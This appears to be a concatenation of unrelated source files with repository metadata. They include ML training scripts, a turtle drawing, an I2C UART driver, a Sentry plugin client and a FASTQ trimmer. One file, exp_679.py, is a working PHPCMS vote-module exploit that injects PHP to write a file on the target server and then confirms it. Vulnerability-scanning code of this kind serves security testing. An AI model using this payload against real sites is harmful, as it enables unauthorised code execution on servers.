import torch
import wandb
import torch.nn as nn
import torch.nn.functional as F
from tqdm import tqdm
import os
import time
import numpy as np
from utils.data import get_dataloaders, InputExample, InputFeatures
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
def train_draft():
train_dl, val_dl, test_dl, tokenizer = get_dataloaders(is_small=config.small)
if(config.test):
print("Test model",config.model)
model = Transformer(model_file_path=config.save_path,is_eval=True)
evaluate(model,data_loader_test,model_name=config.model,ty='test')
exit(0)
model = Summarizer(is_draft=True, toeknizer=tokenizer)
print("TRAINABLE PARAMETERS",count_parameters(model))
print("Use Cuda: ", config.USE_CUDA)
best_rouge = 0
cnt = 0
eval_iterval = 300
wandb.init(project=config.experiment, config={
"model_name": config.model_name,
"learning_rate": config.lr,
"batch_size": config.batch_size,
"hop": config.hop,
"heads": config.heads,
"epochs": config.epochs,
"beam_size": config.beam_size,
"emb_dim": config.emb_dim,
'cuda': config.USE_CUDA
})
conf = wandb.config
for e in range(config.epochs):
# model.train()
print("Epoch", e)
l = []
pbar = tqdm(enumerate(train_dl),total=len(train_dl))
for i, d in pbar:
loss = model.train_one_batch(d)
l.append(loss.item())
pbar.set_description("TRAIN loss:{:.4f}".format(np.mean(l)))
if i%eval_iterval==0:
# model.eval()
loss,r_avg, r1, r2, rl = evaluate(model,val_dl,model_name=config.model,ty="train")
wandb.log({"epoch": e,
"loss":loss,
"r_avg":r_avg,
"r1":r1,
"r2":r2,
"rl":rl})
# each epoch is long,so just do early stopping here.
if(r_avg > best_rouge):
best_rouge = r_avg
cnt = 0
model.save_model(loss,e,r_avg)
else:
cnt += 1
if(cnt > 20): break
# model.train()
# model.eval()
loss,r_avg, r1, r2, rl = evaluate(model,val_dl,model_name=config.model,ty="valid")
wandb.finish()
if __name__ == "__main__":
train_draft()
|
[
"sylvanusmahe@Sylvanuss-MacBook-Pro.local"
] |
sylvanusmahe@Sylvanuss-MacBook-Pro.local
|
4d1858de9f200007868855912c5cb09bbd0ff480
|
b99255c89683d4123a560a1eb6221b21013d917d
|
/path_manager/page/category_page.py
|
f51ce67d375f686b79ed3751f06300e58f94fc61
|
[
"MIT"
] |
permissive
|
sweetcolor/internet_market_scraper
|
f7a89e8c54124aadfecaa89f1c84d6c73762ff8b
|
f7eb8c9ade2c0a956ba5d5b7e6173010c85afed6
|
refs/heads/master
| 2021-09-04T04:05:46.529150
| 2018-01-15T17:02:59
| 2018-01-15T17:02:59
| 115,523,578
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 156
|
py
|
from path_manager.page.page import Page
class CategoryPage(Page):
def __init__(self, link, parent_page):
super().__init__(link, parent_page)
|
[
"sweet3color@gmail.com"
] |
sweet3color@gmail.com
|
8dffd82bcaecce6cabc8c75ad494f05fdb50eb2c
|
463b1807820b9fa119e0c17afaa06840fef0e2a3
|
/TURTLE/Rainbow.py
|
c1cd2fce89f6b3134ecc681a44f9b1183f16a2cc
|
[] |
no_license
|
ferdi-oktavian/Python
|
ad8aac711d5565739077a6e5358777807dd464d3
|
27ad83aeedb3e460927bfcf179bc4e4b1ed28366
|
refs/heads/main
| 2023-03-09T02:49:54.481087
| 2021-03-02T00:12:54
| 2021-03-02T00:12:54
| 343,593,542
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 681
|
py
|
import turtle
import colorsys
def draw_one_color_arc(x, y, r, pensize, color):
turtle.up();turtle.goto(x+r,y)
turtle.down();turtle.seth(90)
turtle.pensize(pensize);turtle.pencolor(color)
turtle.circle(r,180)
turtle.speed(0)
turtle.hideturtle()
turtle.bgcolor('light blue')
turtle.title('rainboww')
turtle.setup(700, 700)
num_colors = 49
radius = 400
penwidth = 20 * 7 / num_colors
hue = 0
for i in range(num_colors):
(r, g, b) = colorsys.hsv_to_rgb(hue,1,1)
draw_one_color_arc(0, -100,radius,penwidth,(r,g,b))
radius -= (penwidth-1)
hue += 0.9/num_colors
turtle.getscreen()._root.mainloop()
|
[
"noreply@github.com"
] |
ferdi-oktavian.noreply@github.com
|
9907349705be2a4fdbc48e95c52054b00ad85246
|
4efcfcaec6cc956d15a1ae966905911809c4de18
|
/Supervised Deep Learning/Artificial Neural Networks (ANN)/artificial_neural_network.py
|
72ded64f7630ebf2867544dae348d8c8a1fe4aa0
|
[
"BSD-3-Clause"
] |
permissive
|
Nikhil-Xavier-DS/Deep-Learning-Algorithms-KERAS
|
9aa54eebaf688d83efa13767dd0e378339774e9c
|
7bbda3b1495d2e377abef2938c193afd34d95038
|
refs/heads/master
| 2020-03-28T09:00:22.535353
| 2018-09-09T08:30:32
| 2018-09-09T08:30:32
| 148,006,476
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,994
|
py
|
# Artificial Neural Network
# Import libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Import Dataset
dataset = pd.read_csv('Churn_Modelling.csv')
X = dataset.iloc[:,3: 13].values
y = dataset.iloc[:,13].values
# Encoding categorical data
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
labelencoder_X_1 = LabelEncoder()
X[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])
labelencoder_X_2 = LabelEncoder()
X[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])
onehotencoder = OneHotEncoder(categorical_features = [1])
X = onehotencoder.fit_transform(X).toarray()
X = X[:, 1:]
# Splitting into training set & test set
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature scaling
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
# Let us make ANN
# Import Keras library
import keras
from keras.models import Sequential
from keras.layers import Dense
# Initializing ANN
classifier = Sequential()
# Adding Input layer and First hidden layer
classifier.add(Dense(output_dim = 6, init = 'uniform', activation = 'relu', input_dim = 11))
# Adding Second hidden layer
classifier.add(Dense(output_dim = 6, init = 'uniform', activation = 'relu'))
# Adding Output layer
classifier.add(Dense(output_dim = 1, init = 'uniform', activation = 'sigmoid'))
# Compiling ANN
classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
# Fit ANN to training set
classifier.fit(X_train, y_train, batch_size = 10, epochs = 100)
# Predict and evaluate model
y_pred = classifier.predict(X_test)
for i in range(0, len(y_pred)):
if(y_pred[i] >= 0.5):
y_pred[i] = True
else:
y_pred[i] = False
# Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
cm
|
[
"nikhilxavier@yahoo.com"
] |
nikhilxavier@yahoo.com
|
31508bdac6628284abbbd3294418d6af5c325c67
|
b8d5270f2af049e795d02887fbe322054b82f600
|
/SC16IS750.py
|
28bdf44a54e2501340f0142873eca248d24d6733
|
[] |
no_license
|
Harri-Renney/SC16IS750
|
1d73c42aa7fbec05413d7c2e7ea4fca2477e799c
|
8da36a31ca930ea88af2e73cce6ea163bda3ba25
|
refs/heads/master
| 2021-08-18T05:26:22.753747
| 2020-03-26T20:58:12
| 2020-03-26T20:58:12
| 141,274,557
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,484
|
py
|
import smbus
from enum import IntEnum
class SC16IS750:
self.DEVICE_ADDRESS = 0x9A
CrystalFrequency = 0
class registers(IntEnum):
RHR= 0x00 # Receive Holding Register (R)
THR= 0x00 # Transmit Holding Register (W)
IER= 0x01 # Interrupt Enable Register (R/W)
FCR= 0x02 # FIFO Control Register (W)
IIR= 0x02 # Interrupt Identification Register (R)
LCR= 0x03 # Line Control Register (R/W)
MCR= 0x04 # Modem Control Register (R/W)
LSR= 0x05 # Line Status Register (R)
MSR= 0x06 # Modem Status Register (R)
SPR= 0x07 # Scratchpad Register (R/W)
TCR= 0x06 # Transmission Control Register (R/W)
TLR= 0x07 # Trigger Level Register (R/W)
TXLVL = 0x08 # Transmit FIFO Level Register (R)
RXLVL = 0x09 # Receive FIFO Level Register (R)
IODIR= 0x0A # I/O pin Direction Register (R/W)
IOSTATE= 0x0B # I/O pin States Register (R)
IOINTENA= 0x0C # I/O Interrupt Enable Register (R/W)
IOCONTROL= 0x0E # I/O pins Control Register (R/W)
EFCR= 0x0F # Extra Features Register (R/W)
# -- Special Register Set (Requires LCR[7] = 1 & LCR != 0xBF to use)
DLL= 0x00 # Divisor Latch LSB (R/W)
DLH= 0x01 # Divisor Latch MSB (R/W)
# -- Enhanced Register Set (Requires LCR = 0xBF to use)
EFR= 0x02 # Enhanced Feature Register (R/W)
XON1= 0x04 # XOn1 (R/W)
XON2= 0x05 # XOn2 (R/W)
XOFF1= 0x06 # XOff1 (R/W)
XOFF2= 0x07 # XOff2 (R/W)
def init(self, crystalFrequency, deviceaddress=0x9A):
print("Initalising SC16IS750.")
self.DEVICE_ADDRESS = deviceaddress
self.bus = smbus.SMBus(1)
self.crystalFrequency = crystalFrequency
# def __init__():
def readRegister(self, registerAddress):
shiftedDeviceAddress = self.DEVICE_ADDRESS >> 1
shiftedRegisterAddress = registerAddress << 3
registerReadValue = self.bus.read_byte_data(shiftedDeviceAddress, shiftedRegisterAddress)
return registerReadValue
def writeRegister(self, registerAddress, data):
shiftedDeviceAddress = self.DEVICE_ADDRESS >> 1
shiftedRegisterAddress = registerAddress << 3
self.bus.write_byte_data(shiftedDeviceAddress, shiftedRegisterAddress, data)
##Set the desired baudrate of chips UART##
def setBaudrate(self, baudrate):
clockDivisor = (self.readRegister(self.registers.MCR) & 0b10000000) >> 7
if(clockDivisor == 0):
prescaler = 1
elif(clockDivisor == 1):
prescaler = 4
divisor = int((self.crystalFrequency / prescaler) / (baudrate * 16))
lowerDivisor = (divisor & 0xFF)
higherDivisor = (divisor & 0xFF00) >> 8
self.setRegisterBit(self.registers.LCR, 7)
self.writeRegister(self.registers.DLL, lowerDivisor)
self.writeRegister(self.registers.DLH, higherDivisor)
self.unsetRegisterBit(self.registers.LCR, 7)
##Set the desired UART attributes##
def setUARTAttributes(self, dataBits, parityType, stopBits):
#Calculate bits for LCR register#
print("Setting UART attributes.")
##Set the bit in position passed##
def setRegisterBit(self, registerAddress, registerBit):
current = self.readRegister(registerAddress)
updated = current | (1 << registerBit)
self.writeRegister(registerAddress, updated)
##Unset the bit in position passed##
def unsetRegisterBit(self, registerAddress, registerBit):
current = self.readRegister(registerAddress)
updated = current & ~(1 << registerBit)
self.writeRegister(registerAddress, updated)
##Checks if any data in FIFO buffer##
def isDataWaiting(self):
register = self.readRegister(self.registers.LSR)
isWaiting = register & 0b1
if(isWaiting):
return True
return False
##Checks number of bytes waiting in FIFO buffer##
def dataWaiting(self):
return self.readRegister(self.registers.RXLVL)
##Writes to Scratch register and checks successful##
def testChip(self):
self.writeRegister(self.registers.SPR, 0xFF)
if(self.readRegister(self.registers.SPR) != 0xFF):
return False
return True
|
[
"harri.renney@blino.co.uk"
] |
harri.renney@blino.co.uk
|
e2e44ffd1b8897513aaba446dd704ac14b2c5945
|
35dbd536a17d7127a1dd1c70a2903ea0a94a84c2
|
/src/sentry_plugins/sessionstack/client.py
|
2c50f1bafe960bbe0331c77cff05e234168642de
|
[
"Apache-2.0",
"BUSL-1.1"
] |
permissive
|
nagyist/sentry
|
efb3ef642bd0431990ca08c8296217dabf86a3bf
|
d9dd4f382f96b5c4576b64cbf015db651556c18b
|
refs/heads/master
| 2023-09-04T02:55:37.223029
| 2023-01-09T15:09:44
| 2023-01-09T15:09:44
| 48,165,782
| 0
| 0
|
BSD-3-Clause
| 2022-12-16T19:13:54
| 2015-12-17T09:42:42
|
Python
|
UTF-8
|
Python
| false
| false
| 4,683
|
py
|
import requests
from sentry.http import safe_urlopen
from sentry.utils import json
from .utils import add_query_params, get_basic_auth, remove_trailing_slashes
ACCESS_TOKEN_NAME = "Sentry"
DEFAULT_SENTRY_SOURCE = "sentry"
API_URL = "https://api.sessionstack.com"
PLAYER_URL = "https://app.sessionstack.com/player"
WEBSITES_ENDPOINT = "/v1/websites/{}"
SESSION_ENDPOINT = "/v1/websites/{}/sessions/{}"
ACCESS_TOKENS_ENDPOINT = "/v1/websites/{}/sessions/{}/access_tokens"
SESSION_URL_PATH = "/#/sessions/"
MILLISECONDS_BEFORE_EVENT = 5000
class SessionStackClient:
def __init__(self, account_email, api_token, website_id, **kwargs):
self.website_id = website_id
api_url = kwargs.get("api_url") or API_URL
self.api_url = remove_trailing_slashes(api_url)
player_url = kwargs.get("player_url") or PLAYER_URL
self.player_url = remove_trailing_slashes(player_url)
self.request_headers = {
"Authorization": get_basic_auth(account_email, api_token),
"Content-Type": "application/json",
}
def validate_api_access(self):
website_endpoint = WEBSITES_ENDPOINT.format(self.website_id)
try:
response = self._make_request(website_endpoint, "GET")
except requests.exceptions.ConnectionError:
raise InvalidApiUrlError
if response.status_code == requests.codes.UNAUTHORIZED:
raise UnauthorizedError
elif response.status_code == requests.codes.BAD_REQUEST:
raise InvalidWebsiteIdError
elif response.status_code == requests.codes.NOT_FOUND:
raise InvalidApiUrlError
response.raise_for_status()
def get_session_url(self, session_id, event_timestamp):
player_url = self.player_url + SESSION_URL_PATH + session_id
query_params = {}
query_params["source"] = DEFAULT_SENTRY_SOURCE
access_token = self._get_access_token(session_id)
if access_token is not None:
query_params["access_token"] = access_token
if event_timestamp is not None:
start_timestamp = self._get_session_start_timestamp(session_id)
if start_timestamp is not None:
pause_at = event_timestamp - start_timestamp
play_from = pause_at - MILLISECONDS_BEFORE_EVENT
query_params["pause_at"] = pause_at
query_params["play_from"] = play_from
return add_query_params(player_url, query_params)
def _get_access_token(self, session_id):
access_token = self._create_access_token(session_id)
if not access_token:
access_token = self._get_existing_access_token(session_id)
return access_token
def _get_existing_access_token(self, session_id):
response = self._make_access_tokens_request(session_id, "GET")
if response.status_code != requests.codes.OK:
return None
access_tokens = json.loads(response.content).get("data")
for token in access_tokens:
token_name = token.get("name")
if token_name == ACCESS_TOKEN_NAME:
return token.get("access_token")
return None
def _create_access_token(self, session_id):
response = self._make_access_tokens_request(
session_id=session_id, method="POST", body={"name": ACCESS_TOKEN_NAME}
)
if response.status_code != requests.codes.OK:
return None
return json.loads(response.content).get("access_token")
def _make_access_tokens_request(self, session_id, method, **kwargs):
access_tokens_endpoint = self._get_access_tokens_endpoint(session_id)
return self._make_request(access_tokens_endpoint, method, **kwargs)
def _get_access_tokens_endpoint(self, session_id):
return ACCESS_TOKENS_ENDPOINT.format(self.website_id, session_id)
def _get_session_start_timestamp(self, session_id):
endpoint = SESSION_ENDPOINT.format(self.website_id, session_id)
response = self._make_request(endpoint, "GET")
if response.status_code == requests.codes.OK:
return json.loads(response.content).get("client_start")
def _make_request(self, endpoint, method, **kwargs):
url = self.api_url + endpoint
request_kwargs = {"method": method, "headers": self.request_headers}
body = kwargs.get("body")
if body:
request_kwargs["json"] = body
return safe_urlopen(url, **request_kwargs)
class UnauthorizedError(Exception):
pass
class InvalidWebsiteIdError(Exception):
pass
class InvalidApiUrlError(Exception):
pass
|
[
"noreply@github.com"
] |
nagyist.noreply@github.com
|
f5dff936815d2f26b852c4ae10f5bf7d9e9004b8
|
ed569623f4686688edac40c2dabde0206546316b
|
/tests/unit/models/company_test.py
|
00eea0a1fdd38459098b429e193dbf491738925e
|
[] |
no_license
|
leobene/RadarMiles
|
34753114854f9dff7ee781060c2f99ec3a54d468
|
9810b04f29ba5a514dfcbfb0679f304f93842d37
|
refs/heads/master
| 2020-04-08T09:13:02.806563
| 2018-12-03T23:46:58
| 2018-12-03T23:46:58
| 159,213,641
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 711
|
py
|
from models.company import CompanyModel
from tests.base_test import BaseTest
class CompetitionTest(BaseTest):
def test_create_competition(self):
company = CompanyModel('GOL')
self.assertEqual(company.name, 'GOL',
"The name of the company after creation does not equal the constructor argument.")
def test_competition_json(self):
company = CompanyModel('GOL')
expected = {
'id': company.id,
'name': company.name,
}
self.assertEqual(
company.json(),
expected,
"The JSON export of the company is incorrect. Received {}, expected {}.".format(company.json(), expected))
|
[
"leobene@192.168.0.100"
] |
leobene@192.168.0.100
|
3a4928e43a8d2eb7a9e58b5e4c3c04eee176b3f5
|
0798277f2706998ab80442ac931579eb47f676e5
|
/bin/metric-markdown
|
ed615b4e0809a60c37d486fe5df8f258f20d47d9
|
[
"Apache-2.0"
] |
permissive
|
isabella232/pulse-api-cli
|
49ed38b0694ab289802f69ee6df4911cf3378e3f
|
b01ca65b442eed19faac309c9d62bbc3cb2c098f
|
refs/heads/master
| 2023-03-18T00:23:15.295727
| 2016-05-13T15:44:08
| 2016-05-13T15:44:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 817
|
#!/usr/bin/env python
#
# Copyright 2015 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from boundary import MetricMarkdown
"""
Reads the plugin.json manifest file looks up the definition and then outputs a markdown table
"""
if __name__ == "__main__":
c = MetricMarkdown()
c.execute()
|
[
"davidg@boundary.com"
] |
davidg@boundary.com
|
|
6e295f76fbefde92e0f7d98a4c2ea8a9eb480c01
|
71e6546941d2763946b69800dfb15679fab70d14
|
/image_process.py
|
7b0734e9d6eda4d01c3dc08c071991c44d18d957
|
[] |
no_license
|
ruitengchang/private
|
510d58d1ca5ad5cc7ec7147f0ae00249f38da0a4
|
f9ac73cd1f21d4f1febc0abca627bb1fce2fe3a5
|
refs/heads/master
| 2020-06-05T17:12:34.768517
| 2019-06-18T09:52:55
| 2019-06-18T09:52:55
| 192,493,277
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,368
|
py
|
import cv2 as cv
import numpy as np
import os
def line_image(image):
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
#cv.imshow("gray",gray)
edges = cv.Canny(gray, 100, 500, apertureSize=3)
#cv.imshow("canny",edges)
# contours,hierarchy=cv.findContours(edges,cv.RETR_LIST,cv.CHAIN_APPROX_SIMPLE)
# point_size=1
# point_color=(0,0,255)
# thickness=4
# print("contours",np.array(contours).shape)
# for i in range(np.array(contours).shape[0]):
# cv.circle(image,(contours[i][0][0][0],contours[i][0][0][1]),point_size,point_color,thickness)
# cv.imshow("result",image)
#cv.imshow("lunkuo",contours)
#r,g,b=cv.split(image)
# cv.connectedComponents(r)
# cv.imshow("conn",cv.merge([r,r,r]))
#print("dian:",hierarchy)
#print("dian shape:",hierarchy.shape)
lines = cv.HoughLines(edges, 1, np.pi / 2, 190)
#print("lines:",lines.shape)
#print(lines)
col=[]
row=[]
#print(col)
#print("----")
for line in lines:
rho, theta = line[0]
if(theta<1):
col.append(rho)
else:
row.append(rho)
a = np.cos(theta)
b = np.sin(theta)
x0 = a * rho
y0 = b * rho
x1 = int(x0 + 2000 * (-b))
y1 = int(y0 + 2000 * (a))
x2 = int(x0 - 2000 * (-b))
y2 = int(y0 - 2000 * (a))
cv.line(image, (x1, y1), (x2, y2), (0, 0, 255), 2)
#cv.imshow("hough", image)
return col,row
def judge(image,p1,p2,p3,p4):
count=0.0
r,g,b=cv.split(image)
#print(r.shape)#(1080,550)
total=float((abs(p4[0]-p1[0]))*(abs(p4[1]-p1[1])))
for i in range(int(abs(p4[0]-p1[0]))):
for j in range(int(abs(p4[1]-p1[1]))):
x=int(i+p1[0])
y=int(j+p1[1])
if(x>=r.shape[1]):
x=r.shape[1]-1
if(y>=r.shape[0]):
y=r.shape[0]-1
if(r[y][x]!=255):
count=count+1
if(count/total>0.8):
#print("find one")
return 1
else:return 0
def mkdir(path):
# 引入模块
import os
# 去除首位空格
path = path.strip()
# 去除尾部 \ 符号
path = path.rstrip("\\")
# 判断路径是否存在
# 存在 True
# 不存在 False
isExists = os.path.exists(path)
# 判断结果
if not isExists:
# 如果不存在则创建目录
# 创建目录操作函数
os.makedirs(path)
print(path + ' 创建成功')
return True
else:
# 如果目录存在则不创建,并提示目录已存在
print(path + ' 目录已存在')
return False
def img_process(input):
src = cv.imread(input)
_x=src.shape[1]
_y=src.shape[0]
b,g,r=cv.split(src)
for i in range(b.shape[0]):
for j in range(b.shape[1]):
if(b[i][j]!=255):
b[i][j]=0
src_merged=cv.merge([b,b,b])#src:原图,src_merged:二值化的图,需要对两张图都进行直线检测,结合两次直线检测结果。
#cv.imshow("merged",src_merged)
#line_image(src)#对原图进行直线检测
col,row=line_image(src_merged)#对二值化图进行直线检测
col.sort()
row.sort()
if(col[0]>0):
col.append(0)
col.sort()
if(col[len(col)-1]<_x):
col.append(_x)
if(row[0]>0):
row.append(0)
row.sort()
if(row[len(row)-1]<_y):
row.append(_y)
#print(row)
#print(col)
result=[]
for i in range(len(col)-2):
for j in range(len(row)-2):
p1=[col[i],row[j]]
p2=[col[i+1],row[j]]
p3=[col[i],row[j+1]]
p4=[col[i+1],row[j+1]]
if(judge(src_merged,p1,p2,p3,p4)==1):
result.append([p1,p2,p3,p4])
#print("result",np.array(result).shape)
#print(result)
# for i in range(len(result)):
# print(tuple(result[i]))
# cv.rectangle(src_merged,tuple(result[i][0]),tuple(result[i][3]),(0,255,0),2)
# cv.imshow("rec",src_merged)
while(1):#判断区域之间是能够结合,若能结合则结合
do_sth=0
for i in range(len(result)):
for j in range(len(result)-i-1):
if((result[i][1]==result[j][0]) & (result[i][3]==result[j][2])):
result.append([result[i][0],result[j][1],result[i][2],result[j][3]])
result.remove(result[i])
result.remove(result[j-1])
do_sth=1
break
if(do_sth==1):
break
if(do_sth==0):
break
#print(result)
# for i in range(len(result)):
# print(tuple(result[i]))
# cv.rectangle(src_merged,tuple(result[i][0]),tuple(result[i][3]),(0,255,0),2)
# cv.imshow("rec",src_merged)
for i in range(len(result)):
new_img=src[int(result[i][0][1]):int(result[i][2][1]),int(result[i][0][0]):int(result[i][1][0])]
#cv.imshow("new%d"%(i),new_img)
path=input.split(".")
#mkdir("%s"%(path[0]))
#os.chdir("%s"%(path[0]))
filename="%snew%d.jpg"%(path[0],i)
print(filename)
cv.imwrite(filename,new_img)
os.chdir("image_example/1/")
print("out path:",os.getcwd())
files=os.listdir()
for file in files:
img_process(file)
cv.waitKey(0)
cv.destroyAllWindows()
|
[
"noreply@github.com"
] |
ruitengchang.noreply@github.com
|
95d38eb622dd57ea6cf2bba55e5202edeb6e0e3b
|
43ff15a7989576712d0e51f0ed32e3a4510273c0
|
/tools/pocs/bugscan/exp_679.py
|
798104fb95f83ba1ff04752dfd711df064cc3623
|
[] |
no_license
|
v1cker/kekescan
|
f2b51d91a9d6496e2cdc767eb6a600171f513449
|
3daa1775648439ba9e0003a376f90b601820290e
|
refs/heads/master
| 2020-09-19T16:26:56.522453
| 2017-06-15T02:55:24
| 2017-06-15T02:55:24
| 94,495,007
| 6
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,954
|
py
|
# -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
# !/usr/bin/dev python
# -*- coding:utf-8 -*-
"""
reference:
http://www.wooyun.org/bugs/wooyun-2015-0104157
http://www.beebeeto.com/pdb/poc-2015-0086/
"""
import re
import urllib
import urllib2
import base64
import random
def get_vote_links(args):
vul_url = args
vote_url = '%sindex.php?m=vote' % vul_url
code, head, res, _, _ = curl.curl(vote_url)
ids = []
for miter in re.finditer(r'<a href=.*?subjectid=(?P<id>\d+)', res, re.DOTALL):
ids.append(miter.group('id'))
if len(ids) == 0:
return None
return list(set(ids))
def assign(service, args):
if service == 'phpcms':
return True, args
pass
def audit(args):
vul_url = args
ids = get_vote_links(args)
file_name = 'w2x5Tt_%s.php' % random.randint(1,3000)
base64_name = base64.b64encode(file_name)
if ids:
for i in ids:
exploit_url = '%sindex.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % (vul_url, i)
payload = {'subjectid': 1,
'radio[]': ');fputs(fopen(base64_decode(%s),w),"vulnerable test");' % base64_name}
post_data = urllib.urlencode(payload)
code,head,body,_,_=curl.curl('-d "%s" %s' % (post_data, exploit_url))
if code==200:
verify_url = '%sindex.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % (vul_url, i)
code,head,body,_,_=curl.curl(verify_url)
if code==200:
shell_url = '%s%s' % (vul_url, file_name)
code, head, res, _, _ = curl.curl(shell_url)
if code == 200 and 'vulnerable test' in res:
security_hole(vul_url)
if __name__ == "__main__":
from dummy import *
audit(assign('phpcms', 'http://www.jkb.com.cn/')[1])
|
[
"liyueke@huobi.com"
] |
liyueke@huobi.com
|
63cf85af944332bdcc3cf505a3931ab50cb64c0f
|
600f361ac85c87dbc3a17cf3908dc0f4267a8c94
|
/quality-trim.py
|
2c2ac719751b4fb20d6f92a2f88d1c78ab76ac60
|
[] |
no_license
|
LeeBergstrand/Bioinformatics_scripts
|
801f00ea5d4346daf00f92d331f4a87737280ddd
|
0cfab04ecf43cf4f0aeba2d713532190cfc5eed1
|
refs/heads/master
| 2021-01-15T15:23:43.455647
| 2015-05-05T05:25:55
| 2015-05-05T05:25:55
| 19,826,979
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,170
|
py
|
#!/usr/bin/env python
import sys
import screed
import gzip
# python quality-trim.py <input fastq file> <output filtered fastq file>
# MINLENGTH is the minimum lenth of read desired. NCALLS is the percentage of a read with 'N' base calls for which if read has greater, it will be removed.
MINLENGTH = 30
filein = sys.argv[1]
fileout = sys.argv[2]
fw = open(fileout, 'w')
count=0
for n, record in enumerate(screed.open(filein)):
name = record['name']
sequence = record['sequence']
accuracy = record['accuracy']
sequence = sequence.rstrip('N')
accuracy = accuracy[:len(sequence)]
if 'N' in sequence:
continue
else:
trim = accuracy.find('B')
if trim > MINLENGTH or (trim == -1 and len(sequence) > MINLENGTH):
if trim == -1:
fw.write('@%s\n%s\n+\n%s\n' % (name, sequence, accuracy))
else:
fw.write('@%s\n%s\n+\n%s\n' % (name, sequence[:trim], accuracy[:trim]))
count += 1
if n % 1000 == 0:
print 'scanning', n
print 'Original Number of Reads', n + 1
print 'Final Number of Reads', count
print 'Total Filtered', n + 1 - int(count)
|
[
"carden24@mail.ubc.ca"
] |
carden24@mail.ubc.ca
|
db3d9f7ffa0daf93dc6ef9d1b818888be5ac8e5d
|
93afa6da4a41e6346079cf437aa11fe27ae84d93
|
/venv/bin/easy_install
|
c86211b025ea693cb90960dd17d613e34059f37e
|
[] |
no_license
|
alexbatashev/rungekutta
|
20695e3d0706b7cfde2f7b4c0150e74122b4a6d5
|
7c71228b6bbbeebe0771b45e4d85c342f2d2fdd7
|
refs/heads/master
| 2020-05-05T06:56:03.982750
| 2019-04-07T08:29:28
| 2019-04-07T08:29:28
| 179,806,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 454
|
#!/Users/aleksandrbatasev/PycharmProjects/rungekutta/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
|
[
"alexbatashev@outlook.com"
] |
alexbatashev@outlook.com
|
|
f898a507fb5c8d1476d837dc594f7b5fa3b68cd6
|
b80b3b82bb1f4c4019e56bf6eed859d9e1ec024b
|
/python/tolower.py
|
4b443cc2001eef828e7353d23079405cbb61b962
|
[] |
no_license
|
NotaCSstudent/leetcode
|
be484537f20302557411ed0a2d653703b4c86abe
|
13c3fc89e492209f70fcb8e7756c8553f5736a1e
|
refs/heads/main
| 2023-06-08T22:59:41.680890
| 2021-06-20T13:37:46
| 2021-06-20T13:37:46
| 372,983,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 106
|
py
|
class Solution:
def toLowerCase(self, s: str) -> str:
s = s.lower()
return s
|
[
"noreply@github.com"
] |
NotaCSstudent.noreply@github.com
|
d31bf01470b66161944add4d5f0c467767484f48
|
1a7ac4eb338f53e96f92c84d560fd1707607bcc9
|
/ENV/bin/jupyter
|
3897bd35c4d09274ecf81879fcf8337d7d1c9519
|
[] |
no_license
|
kuwar/data-science-python-1
|
cf3d04dbcf3e57fe6976be7e2f3371ee0eb3304f
|
2738d00cb339c250fdeca30ad84d9be7ca87e570
|
refs/heads/master
| 2022-10-18T09:15:56.181434
| 2019-09-10T06:39:44
| 2019-09-10T06:39:44
| 207,480,173
| 0
| 1
| null | 2022-10-13T06:11:52
| 2019-09-10T06:20:01
|
Python
|
UTF-8
|
Python
| false
| false
| 265
|
#!/home/saurav/Documents/GitHub/Python/second/ENV/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_core.command import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"skuwar@olivemedia.co"
] |
skuwar@olivemedia.co
|
|
4aff36fdb71b2bbc4fd29e2773506848f06a1fd6
|
8a7d5d67052892dd5d2a748282958f6244d963c6
|
/google-cloud-sdk/lib/surface/app/domain_mappings/delete.py
|
32842caf145b27ecec1a4e5410e7656b9643a037
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
KisleK/capstone
|
7d1d622bd5ca4cd355302778a02dc6d32ed00c88
|
fcef874f4fcef4b74ca016ca7bff92677673fded
|
refs/heads/master
